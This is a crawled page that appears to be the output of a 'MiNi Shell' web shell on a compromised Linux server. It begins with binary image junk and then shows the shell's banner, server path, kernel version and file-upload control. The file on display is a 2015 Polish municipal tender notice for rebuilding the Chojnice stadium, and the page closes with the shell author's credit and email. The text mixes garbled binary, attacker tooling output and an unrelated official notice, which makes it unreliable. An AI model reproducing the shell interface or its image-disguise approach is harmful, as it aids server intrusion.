JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150210/29108-N-2015.html

<p class="kh_header"><b>Chojnice: Przebudowa urządzeń i obiektów na stadionie miejskim przy ul. Mickiewicza w Chojnicach</b><br>
<b>Numer ogłoszenia: 29108 - 2015; data zamieszczenia: 10.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Stary Rynek 1, 89-600 Chojnice, woj. pomorskie, tel. 052 3971800, faks 052 3972194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miastochojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa urządzeń i obiektów na stadionie miejskim przy ul. Mickiewicza w Chojnicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Budynek przy ul. Jeziornej
1a. W ramach rozbudowy budynku przewiduje się wykonanie stanowiska spikerskiego w formie wykusza wykonanego w systemowej konstrukcji PCV
W ramach przebudowy przewiduje się dostosowanie funkcjonalne obiektu do zmienionych potrzeb a wymagających wykonania  następujących robót:
- rozbiórki części ścian działowych i wykonania nowych zgodnie z założonym układem funkcjonalnym,
- rozbiórki posadzek piwnic i wykonanie nowych wraz z warstwami podkładowymi,
- wyburzenia w miejscu projektowanych otworów okiennych i zamurowania miejsc po likwidowanych
- wymianę stolarki okiennej i drzwiowej w zakresie określonym projektem,
- wykonanie dociepleń wewnętrznych i zewnętrznych ścian budynku,
- wykonanie izolacji akustycznej pomieszczenia prób zespołu muzycznego,
- budowa nowych kominów z prefabrykowanych elementów keramzytobetonowych,
- demontaż i montaż nowych balustrad schodowych,
- wykonanie okładzin schodowych z płytek gresowych,
- ułożenie wykładzin termozgrzewalnych na wylewce samopoziomującej,
- wykonanie tynków na dociepleniach wewnętrznych i przecierek na ścianach pozostałych,
- malowanie wewnętrzne ścian i sufitów,
- docieplenie stropodachu wełną mineralną,
- pokrycie dachu papą termozgrzewalną
- wymiana rynien i rur spustowych, obróbek blacharskich,
- montaż zewnętrznej drabiny aluminiowej,
- wykonanie elewacji budynku,
- montaż systemowego daszku szklanego nad wejściem.

1b. Demontaż wewnętrznych instalacji sanitarnych i wykonanie nowych:
- wody i kanalizacji,
- centralnego ogrzewania,
- gazu,
- wentylacji i klimatyzacji.
 
1c. Instalacje elektryczne wewnątrzbudynkowe
-demontaż istniejącej instalacji wraz z osprzętem
-roboty ogólnobudowlane związane z budową instalacji elektrycznych wewnątrzbudynkowych
-budowa WLZ zasilania rezerwowego
-montaż tablicy licznikowo rozdzielczej z układem ręcznego przełącznika sieć-agregat i głównym wyłącznikiem ppoż
-budowa instalacji oświetlenia podstawowego
-budowa instalacji oświetlenia ewakuacyjnego
-budowa instalacji zasilania gniazd
-budowa instalacji zasilania wypustów urządzeń klimatyzacji, wentylacji itp.
-budowa WLZ do zasilania tablicy rozdzielczej urządzeń teletechnicznych
-montaż tablicy rozdzielczej zasilania urządzeń teletechnicznych
-montaż szafy dystrybucyjnej zasilania awaryjnego UPS systemów teletechnicznych
-pomiary i badania wykonanych instalacji elektrycznych
-badania funkcjonalne wykonanych instalacji elektrycznych

1d. Instalacje teletechniczne wewnątrzbudynkowe
-roboty ogólnobudowlane związane z budową instalacji teletechnicznych wewnątrzbudynkowych
-budowa instalacji sygnalizacji pożaru SAP
-budowa instalacji domofonowej
-montaż szafy dystrybucyjnej nagłośnienia obiektu   serwerownia
-montaż szafy dystrybucyjnej monitoringu wizyjnego oraz systemu kontroli dostępu serwerownia
-montaż instalacji monitoringu wewnętrznego
-montaż lokalnego systemu kontroli dostępu do serwerowni
-montaż wyposażenia i urządzeń aktywnych w serwerowni
-budowa okablowania strukturalnego sieci LAN monitoringu
-montaż terminali obsługowych w pomieszczeniu ochrony i policji
-montaż wyposażenia i urządzeń aktywnych w pomieszczeniu ochrony i policji
-montaż terminala obsługowego nagłośnienia w pomieszczeniu spikera
-pomiary i badania wykonanych instalacji teletechnicznych
-badania funkcjonalne wykonanych instalacji teletechnicznych

Uwaga w ofercie należy uwzględnić : 
- montaż okablowania instalacji antenowej - 4 przewody na dach i rozprowadzenia do 8 przewodów w kanałach razem z siecią LAN po budynku 
- przeniesienie serwera systemu sprzedaży biletów z budynku klubowego przy ul. Mickiewicza do  budynku wielofunkcyjnego przy ul. Jeziornej

2.OŚWIETLENIE PŁYTY GŁÓWNEJ NA STADIONIE
1.Zakres zadania budowy systemu oświetlenia płyty głównej:
-budowa sieci kablowej zasilającej szafy dystrybucyjno-sterujące
-budowa sieci kablowej sterującej
-posadowienie szaf dystrybucyjno-zasilających
-wykonanie fundamentów studniowych pod maszty oświetleniowe
-montaż masztów oświetleniowych
-montaż projektorów i instalacji oświetleniowej na masztach
-wykonanie stanowiska postojowego dla agregatu z ogrodzeniem
-posadowienie i podłączenie agregatu prądotwórczego
-posadowienie złączy kablowych
-wprowadzenie przyłączy kablowych zasilania rezerwowego do budynków
-montaż tablicy sterującej oświetleniem
-montaż układów przełącznika sieć-agregat w obiektach kubaturowych
-pomiary linii kablowych zasilających i sterujących
-uruchomienie systemu zasilania oświetlenia ze sprawdzeniem funkcjonalnym
-uruchomienie systemu zasilania obiektów kubaturowych ze sprawdzeniem funkcjonalnym
-pomiary skuteczności ochrony przeciwporażeniowej
-pomiary natężenia oświetlenia płyty boiska dla scenariuszy sterowania
2.Szczegółowe wymagania wobec opraw oświetleniowych - WG OPISU W SIWZ
3.Szczegółowe wymagania wobec masztów oświetleniowych  MASZT - WG OPISU W SIWZ 
4.Szczegółowe wymagania wobec agregatu
Agregat mobilny zasilania oświetlenia płyty stadionu oraz obiektów kubaturowych powinien posiadać następujące minimalne parametry techniczne oraz wymagania eksploatacyjne: - WG OPISU W SIWZ 

Wyposażenie wymagane
-sterownik lokalny z wyświetlaczem lcd 
-ręczna pompa do spustu oleju 
-wyłącznik sterownika
-filtr paliwa z separatorem wody
-szynowe przyłącze odbioru mocy 
-wyłącznik układu ogrzewania silnika na płycie czołowej 
-wyłącznik główny agregatu
-wanna retencyjna
-cewka podnapięciowa ster. ręczne  lub wzrostowa   ster. automatyczne wyłącznika głównego  
-czujnik wycieku w wannie retencyjnej  
-cyfrowy 3 fazowy AVR
-sygnalizator dźwiękowy awarii  
-odłącznik akumulatora  
-przycisk awaryjnego zatrzymania
-gniazdo odbioru pełnej mocy
-akumulator rozruchowy 
-rozdzielnica elektryczna z gniazdami i zabezpieczeniami wg ustaleń
-ładowarka akumulatora ster. automatyczne
-zabezpieczenie różnicowo-prądowe
-grzałka silnika sterowana termostatem  
-kontrola niskiego ciśnienia oleju  
-pomiar ciśnienia oleju
-kontrola wysokiej temperatury silnika  
-pomiar temperatury silnika
-elektroniczny regulator obrotów  
-rama ze zbiornikiem
-zamykany wlew paliwa na zewnątrz obudowy  
-pomiar poziomu paliwa
-filtr paliwa z separatorem wody  
-tłumik spalin z kompensatorem drgań
-wibroizolatory drgań silnika i prądnicy  
-obudowa wyciszona, wykonana z blachy Al-Zn
-uchwyty transportowe.
Uwaga
Agregat po uruchomieniu, regulacji i badaniach systemu oświetlenia powinien zostać przekazany w gotowości do pracy, z pełnym zbiornikiem paliwa.

Przyczepka do przewozu agregatu  - WG OPISU W SIWZ
Uwaga
Przyczepa do przewozu agregatu powinna zostać zarejestrowana na użytkownika i zostać przekazana w gotowości do poruszania się po drogach publicznych.
Oświetlenie winno spełniać wymagania techniczne dla stadionów I ligi zgodnie z wymaganiami podręcznika licencyjnego PZPN dla I ligi na lata 2014  2015 

3.MONITORING I NAGŁOŚNIENIE 

Przedmiotem zamówienia jest budowa systemu rejestracji imprez masowych oraz nagłośnienia na stadionie Chojniczanka w Chojnicach ul. Mickiewicza 

1.Zakres zadania budowy systemu utrwalania imprez masowych rejestracji audio i video obejmuje:
-demontaż okablowania i urządzeń istniejącego systemu rejestracji imprez masowych
-budowa wielootworowej kanalizacji kablowej teletechnicznej
-budowa światłowodowego okablowania magistralnego monitoringu wizyjnego w kanalizacji kablowej
-budowa symetrycznego okablowania rozdzielczego monitoringu wizyjnego w kanalizacji kablowej
-budowa przyłączy elektrycznych zasilania urządzeń monitoringu
-budowa symetrycznego okablowania systemu rejestracji dźwięku w kanalizacji kablowej
-budowa i przebudowa konstrukcji wsporczych zewnętrznych urządzeń monitoringu
-montaż zewnętrznych urządzeń monitoringu na przygotowanych konstrukcjach wsporczych
-budowa i przebudowa konstrukcji wsporczych zewnętrznych urządzeń systemu rejestracji dźwięku
-montaż zewnętrznych urządzeń systemu rejestracji dźwięku na przygotowanych konstrukcjach wsporczych
-badania i pomiary kablowej infrastruktury światłowodowej monitoringu
-badania i pomiary kabli symetrycznych sytemu monitoringu
-badania i pomiary kabli zasilających sytemu monitoringu
-badania i pomiary kabli symetrycznych sytemu rejestracji dźwięku
-badania i pomiary funkcjonalne systemu rejestracji video na zgodność z wymaganiami projektu i rozporządzenia
-badania i pomiary funkcjonalne systemu rejestracji audio na zgodność z wymaganiami projektu i rozporządzenia

2.Zakres zadania budowy systemu nagłośnienia obejmuje:
-demontaż okablowania i urządzeń istniejącego systemu nagłośnienia
-budowa symetrycznego okablowania systemu nagłośnienia w kanalizacji kablowej
-budowa i przebudowa konstrukcji wsporczych zewnętrznych urządzeń systemu nagłośnienia
-montaż zewnętrznych urządzeń systemu nagłośnienia na przygotowanych konstrukcjach wsporczych
-badania i pomiary kabli symetrycznych sytemu nagłośnienia
-badania i pomiary funkcjonalne systemu nagłośnienia
Monitoring winien spełniać wymagania ustawy o bezpieczeństwie imprez masowych z 20.03.2009 r. z późn. zm.  Dz. U. Nr 62 poz.504   oraz Rozporządzenia Ministra Spraw Wewnętrznych i Administracji  w sprawie sposobu utrwalania przebiegu imprezy masowej z 10.01.2011 r. Dz. U Nr 16 poz.73 
Serwisowanie wbudowanych urządzeń w okresie gwarancji wykonuje Wykonawca.
4. Uporządkowanie terenu po wykonaniu robót oraz odtworzenie zieleni.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.00.00-9, 45.31.00.00-3, 45.31.10.00-0, 45.31.50.00-8, 45.31.23.10-3, 45.31.53.00-1, 45.31.51.00-9, 45.31.61.00-6, 45.31.60.00-6, 45.31.57.00-5, 45.31.20.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  60.000,00 zł (słownie: sześćdziesiąttysięcyzłotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. 
Wykonawca musi przedstawić w wykazie że wykonał co najmniej: 
2 roboty branży budowlanej (w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie), o wartości minimum  1.000.000,00 zł każda;
1 robotę branży elektrycznej (w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie),  polegającą na wykonaniu zewnętrznego oświetlenia boiska sportowego lub stadionu lub parkingu lub kortu tenisowego lub innego terenu otwartego  o wartości minimum 1.000.000 zł ; 
1 robotę branży teletechnicznej  (w okresie ostatnich 5 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie),  polegającą na montażu i uruchomieniu monitoringu kamerowego CCTV wraz z instalacją systemu kontroli ruchu osobowego  i identyfikacji kibica na obiektach obsługujących imprezy masowe zgodnie z ustawą o bezpieczeństwie imprez masowych z 20.03.2009 r. z późn. zm. oraz Rozporządzenia Ministra Spraw Wewnętrznych  i Administracji  w sprawie sposobu utrwalania przebiegu imprezy masowej z 10.01.2011 r. o wartości minimum 1.000.000 zł ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. 
wykonawca musi dysponować osobą/mi zdolną/mi do wykonania przedmiotowego zamówienia posiadającą/mi uprawnienia do kierowania robotami budowlanymi (wzór stanowi Załącznik Nr 6 do SIWZ) w specjalnościach:
a)	konstrukcyjno-budowlanej bez ograniczeń - kierownik budowy
b)	elektrycznej - kierownik robót
c)	sanitarnej - kierownik robót
d)	telekomunikacyjnej - kierownik robót</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. 
posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający,że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 3.000.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>udzielą gwarancji na wykonany przedmiot zamówienia na okres minimum 2 lata  licząc od dnia bezusterkowego odbioru przez Zamawiającego wykonanych robót budowlanych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy 
    w  następujących przypadkach:
A.	W zakresie zmiany terminu wykonania:
konieczności wykonania zamówień dodatkowych, uniemożliwiających wykonanie zamówienia podstawowego,
wystąpienia nie zinwentaryzowanych urządzeń podziemnych i związanych 
z tym kolizji, 
z powodu nie przewidzianego braku płynności finansowej u Zamawiającego,
wystąpienie siły wyższej i innych zdarzeń nadzwyczajnych, 
ujawnienia się wad/braków/błędów w dokumentacji projektowej skutkujących nie możliwością dochowania pierwotnego terminu realizacji umowy
B.	W zakresie płatności i innych:
aktualizacji rozwiązań ze względu na postęp technologiczny lub gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu,
zmiany kolejności wykonania części zamówienia bądź rezygnacji z wykonania części zamówienia,
zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy.
C.	W zakresie innych zmian 
zmiana zakresu robót powierzonego podwykonawcom. 
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
W przypadku zaniechania części zakresu robót z przyczyn, których nie można było przewidzieć, które są niezależne od Zamawiającego, Zamawiający zastrzega sobie możliwość zmniejszenia wynagrodzenia o zaniechane czynności.  Podstawą zaniechania zakresu robót i zmniejszenia wynagrodzenia będzie protokół konieczności, sporządzony przez kierownika budowy i Inspektora Nadzoru Inwestorskiego oraz zatwierdzony przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miastochojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Chojnicach Stary Rynek 1  89-600 Chojnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2015 godzina 10:00, miejsce: Urząd Miejski w Chojnicach Stary Rynek 1  89-600 Chojnice
Biuro Podawcze - Informacja  pokój 306.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com